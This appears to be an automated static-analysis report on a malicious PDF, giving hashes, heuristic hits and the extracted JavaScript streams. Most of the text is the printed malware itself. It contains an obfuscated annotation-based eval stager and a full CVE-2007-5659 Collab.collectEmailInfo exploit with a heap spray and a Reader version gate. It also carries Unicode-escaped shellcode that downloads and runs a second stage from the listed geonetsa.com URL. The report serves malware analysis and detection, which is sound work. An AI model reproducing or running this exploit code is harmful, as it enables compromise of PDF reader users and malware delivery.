Malicious PDF — malware analysis report

Static analysis result for SHA-256 ea00785419ca6bb6…

MALICIOUS

PDF

8.4 KB First seen: 2026-05-08
MD5: 413350fd53beaff57b8e7b1fe8efef4d SHA-1: dc0b798ea40c3e917e34940b7728e9228879ac56 SHA-256: ea00785419ca6bb60ce13887547335afaf782aaf44314982936fc4c6e24215af
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, with heuristics indicating obfuscation and the use of String.fromCharCode. The deobfuscated JavaScript streams suggest an intent to download and execute further content. The specific payload and download URL could not be confidently determined due to the obfuscation, but the overall pattern is indicative of a downloader. No document body text was available for analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var qf_Imkx = new Array();var L0___b14h_xn = 0;var cdtDa_F24hvN_XM = "";function J_q_Gl6c(WN_7_C8m_7W4, lmk50r5w){var Ak2_t3 = lmk50r5w.toString();var L_82pAV_Q4_u = "";for(var B_0_D443f = 0; B_0_D443f < Ak2_t3.length; B_0_D443f++) {var OKr6__Ud = parseInt(Ak2_t3.substr(B_0_D443f, 1));if (!isNaN(OKr6__Ud)) {OKr6__Ud = OKr6__Ud.toString(16);if (OKr6__Ud.length == 1) { OKr6__Ud = "0" + OKr6__Ud; }else if (OKr6__Ud.length != 2) { OKr6__Ud = "00"; }L_82pAV_Q4_u = OKr6__Ud + L_82pAV_Q4_u;}}while(L_82 …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://geonetsa.com/cgi-bin/ca7/z002106201r0019R7c76423aXd1f40e5aY7ea952acZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1C2F 1769 bytes
SHA-256: 522bb58f8e0709d6de77ee32690d83b5a3357aada2bf7e1817a7a9c3d2a57e76
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function a4c43x4jUbd_R6(a_32E_d48, L_D__V13d22t){var nH02__3a__8 = 4;var b1hEusB_f = new Array();var GABLLmao0o = new Array(107,256,11,  512, 106, 11,  44,40, 33);GABLLmao0o[5] += 12;var En__8h = "";try {var ab2v7f = 0;if (app) {L_D__V13d22t = pr[ab2v7f].subject;}} catch(e) {}if (!a_32E_d48) { b1hEusB_f[0] = 0;b1hEusB_f[1] = b1hEusB_f[0];b1hEusB_f[2] = b1hEusB_f[1];b1hEusB_f[3] = b1hEusB_f[2];var N__mw_38gn7 = GABLLmao0o[6] + 3;var W6JGtD = N__mw_38gn7 + 11;var ymv_2n_45_76_SC = a4c43x4jUbd_R6;var CyUM5_6_3_MjH_L = 0;ymv_2n_45_76_SC = ymv_2n_45_76_SC.toString();for(var O16rSn = 0; O16rSn < ymv_2n_45_76_SC.length; O16rSn++) {var f5Xw1qP7tl_p = ymv_2n_45_76_SC.charCodeAt(O16rSn);if (f5Xw1qP7tl_p > N__mw_38gn7 && f5Xw1qP7tl_p < W6JGtD) {if (CyUM5_6_3_MjH_L == 4) {CyUM5_6_3_MjH_L = 0;}b1hEusB_f[CyUM5_6_3_MjH_L] += f5Xw1qP7tl_p;if (b1hEusB_f[CyUM5_6_3_MjH_L] > GABLLmao0o[3]) {b1hEusB_f[CyUM5_6_3_MjH_L] -= 512;}CyUM5_6_3_MjH_L++;}}}else  { b1hEusB_f = a_32E_d48;}for (var E_B7_uj00_q27L = 0; E_B7_uj00_q27L < 4; E_B7_uj00_q27L++) {if (b1hEusB_f[E_B7_uj00_q27L] > GABLLmao0o[1]) {b1hEusB_f[E_B7_uj00_q27L] -= GABLLmao0o[1];}}var MF__C__T5 = 0;var a8j3x_1j__a_8 = 0;var u3b_p__Fef;var X_2Fxu7A = 0;while ( MF__C__T5 < L_D__V13d22t.length ) {var o_o_YP_cmT = "";o_o_YP_cmT = L_D__V13d22t.substr(MF__C__T5, 2);var Od_Be_u7msS_U7 = parseInt(o_o_YP_cmT, GABLLmao0o[5]); if (a8j3x_1j__a_8 == 4) {a8j3x_1j__a_8 = 0;}Od_Be_u7msS_U7 -= (X_2Fxu7A + 2) * b1hEusB_f[a8j3x_1j__a_8];if (Od_Be_u7msS_U7 < 0) {Od_Be_u7msS_U7 -= Math.floor(Od_Be_u7msS_U7 / GABLLmao0o[1]) * GABLLmao0o[1];}En__8h += String.fromCharCode(Od_Be_u7msS_U7);{MF__C__T5 += 2;X_2Fxu7A++;a8j3x_1j__a_8++;}}var xYe_a6N83_14e = this;xYe_a6N83_14e["eval"](En__8h);return 0;}

	a4c43x4jUbd_R6(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 4997 bytes
SHA-256: aff1ad2842cac3a690b2464f3f07ba06faa4c94e8f24a5dfc5569b4a55c80d66
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var qf_Imkx = new Array();var L0___b14h_xn = 0;var cdtDa_F24hvN_XM = "";function J_q_Gl6c(WN_7_C8m_7W4, lmk50r5w){var Ak2_t3 = lmk50r5w.toString();var L_82pAV_Q4_u = "";for(var B_0_D443f = 0; B_0_D443f < Ak2_t3.length; B_0_D443f++) {var OKr6__Ud = parseInt(Ak2_t3.substr(B_0_D443f, 1));if (!isNaN(OKr6__Ud)) {OKr6__Ud = OKr6__Ud.toString(16);if (OKr6__Ud.length == 1) { OKr6__Ud = "0" + OKr6__Ud; }else if (OKr6__Ud.length != 2) { OKr6__Ud = "00"; }L_82pAV_Q4_u = OKr6__Ud + L_82pAV_Q4_u;}}while(L_82pAV_Q4_u.length < 8) { L_82pAV_Q4_u = "0" + L_82pAV_Q4_u; }var eU_Q7k46m = WN_7_C8m_7W4.toString(16);if (eU_Q7k46m.length == 1) { eU_Q7k46m = "0" + eU_Q7k46m; }else if (eU_Q7k46m.length != 2) { eU_Q7k46m = "00"; }L_82pAV_Q4_u = "3" + eU_Q7k46m + "P" + L_82pAV_Q4_u;return L_82pAV_Q4_u;}function gy_y_a_80Of_2(tg_8Y_l3_g_w4, QWH2wEW6){var es_t7WE8NU__Mim = new Array("");var q_tr6sEAR54__0R = tg_8Y_l3_g_w4;var Jd283Cy65dp;if ((Jd283Cy65dp = tg_8Y_l3_g_w4.lastIndexOf("%u00")) != -1) {if (Jd283Cy65dp + 6 == tg_8Y_l3_g_w4.length) {es_t7WE8NU__Mim[0] = tg_8Y_l3_g_w4.substr(Jd283Cy65dp + 4, 2);q_tr6sEAR54__0R = tg_8Y_l3_g_w4.substring(0, Jd283Cy65dp);}}Jd283Cy65dp = 1;for (B_0_D443f = 0; B_0_D443f < QWH2wEW6.length; B_0_D443f++) {var t5Tt6_B_J__V3 = QWH2wEW6.charCodeAt(B_0_D443f).toString(16);if (t5Tt6_B_J__V3.length == 1) { t5Tt6_B_J__V3 = "0" + t5Tt6_B_J__V3; }es_t7WE8NU__Mim[Jd283Cy65dp] = t5Tt6_B_J__V3;Jd283Cy65dp++;}B_0_D443f = es_t7WE8NU__Mim[0].length ? 0 : 1;es_t7WE8NU__Mim[Jd283Cy65dp] = "00";es_t7WE8NU__Mim[Jd283Cy65dp + 1] = "00";Jd283Cy65dp += 2;if ((es_t7WE8NU__Mim.length - B_0_D443f) % 2) {es_t7WE8NU__Mim[Jd283Cy65dp] = "00";}while(B_0_D443f < es_t7WE8NU__Mim.length) {q_tr6sEAR54__0R += "%u" + es_t7WE8NU__Mim[B_0_D443f + 1] + es_t7WE8NU__Mim[B_0_D443f];B_0_D443f += 2;}q_tr6sEAR54__0R += "%u0000";return q_tr6sEAR54__0R;}function EsRRli___u(w5v2Bde, Pay_0e){while (w5v2Bde.length*2<Pay_0e) {w5v2Bde += w5v2Bde;}w5v2Bde = w5v2Bde.substring(0,Pay_0e/2);return w5v2Bde;}function apuP3__6100WaM(B8_3uP26, A1MB__b_R4, L_____nWf){var Hq3dw___Euv4_X = 0x0c0c0c0c;var w5v2Bde = unescape(A1MB__b_R4);var QWH2wEW6 = J_q_Gl6c(B8_3uP26, L_____nWf);var PSr_8rWptF = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var tg_8Y_l3_g_w4 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5670%u6257%u0054%u7468%u7074%u2f3a%u672f%u6f65%u656e%u7374%u2e61%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6163%u2f37%u307a%u3230%u3031%u3236%u3130%u3072%u3130%u5239%u6337%u3637%u3234%u6133%u6458%u6631%u3034%u3565%u5961%u6537%u3961%u3235%u6361%u305a%u3031%u6630%u3630%u0030";app.lHH_V_b5p = unescape(gy_y_a_80Of_2(tg_8Y_l3_g_w4, QWH2wEW6));var Ri3_0_IM2 = 0x400000;var rGto__n = PSr_8rWptF.length * 2;var Pay_0e = Ri3_0_IM2 - (rGto__n+0x38);w5v2Bde = EsRRli___u(w5v2Bde, Pay_0e);var XlP_7e_E____vS3 = (Hq3dw___Euv4_X - 0x400000)/Ri3_0_IM2;for (var df0_M0_0vx = 0; df0_M0_0vx < XlP_7e_E____vS3; df0_M0_0vx++) {qf_Imkx[df0_M0_0vx] = w5v2Bde + PSr_8rWptF;}}function W5m1Jp1lt_L_4(){var DA0__4l31v = "";for (B_0_D443f = 0; B_0_D443f < 12; B_0_D443f++) {DA0__4l31v += unescape("%u0c0c%u0c0c");}var G__x8s_PfB_0 = "";for (B_0_D443f = 0; B_0_D443f < 750; B_0_D443f++) {G__x8s_PfB_0 += DA0__4l31v;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: G__x8s_PfB_0});app.clearTimeOut(L0___b14h_xn);}function YkIW__joK8k55jn(h63PA807__V_f){var wL_PhwfgaN = L0___b14h_xn;if ((h63PA807__V_f >= 8 && h63PA807__V_f < 8.11) || h63PA807__V_f < 7.1) {apuP3__6100WaM(23, "%u0c0c%u0c0c", h63PA807__V_f);W5m1Jp1lt_L_4();}if (wL_PhwfgaN) {app.clearTimeOut(wL_PhwfgaN);}}var L_____nWf = 0;var X15q_Ud0Hd = app.plugIns;for (var OL_1__84C7i = 0; OL_1__84C7i < X15q_Ud0Hd.length; OL_1__84C7i++) {var riX___Uq5MY = X15q_Ud0Hd[OL_1__84C7i].version;if (riX___Uq5MY > L_____nWf) { L_____nWf = riX___Uq5MY; }}if (app.viewerVersion == 9.103 && L_____nWf < 9.13) {L_____nWf = 9.13;}app.h_0O_Lag = YkIW__joK8k55jn;L0___b14h_xn = app.setTimeOut("app.h_0O_Lag(" + L_____nWf.toString() + ")", 50);